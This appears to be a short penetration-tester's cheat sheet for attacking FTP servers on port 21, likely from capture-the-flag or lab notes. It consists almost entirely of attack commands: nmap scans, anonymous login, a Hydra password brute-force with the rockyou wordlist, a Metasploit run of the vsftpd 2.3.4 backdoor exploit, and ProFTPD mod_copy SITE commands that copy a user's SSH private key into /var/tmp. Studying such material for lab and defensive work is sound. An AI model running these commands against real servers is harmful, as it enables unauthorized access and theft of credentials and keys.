Skip to content

Port 21 - ftp

Nmap

nmap -p 21 -A $(target)

Anonymous login

lftp $(target)
ftp $(target)
> anonymous
> anonymous

Bruteforce - Hydra

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.227.75 ftp

Nmap script for ftp

find /  -name *.nse 2>/dev/null | grep 'ftp' | tee nmap.script
> ftp-syst.nse
> tftp-enum.nse
> ftp-libopie.nse
> ftp-anon.nse
> ftp-vuln-cve2010-4221.nse
> ftp-proftpd-backdoor.nse
> ftp-bounce.nse
> ftp-brute.nse
> ftp-vsftpd-backdoor.nse
nmap -p 21 --script=ftp-* $(target)
nmap -p 21 --script=ftp-anon.nse $(target)

Exploit

ProFtpd

searchsploit proftpd 1.3.5

VsFtpd 2.3.4

msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit

FTP Copy & Past

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub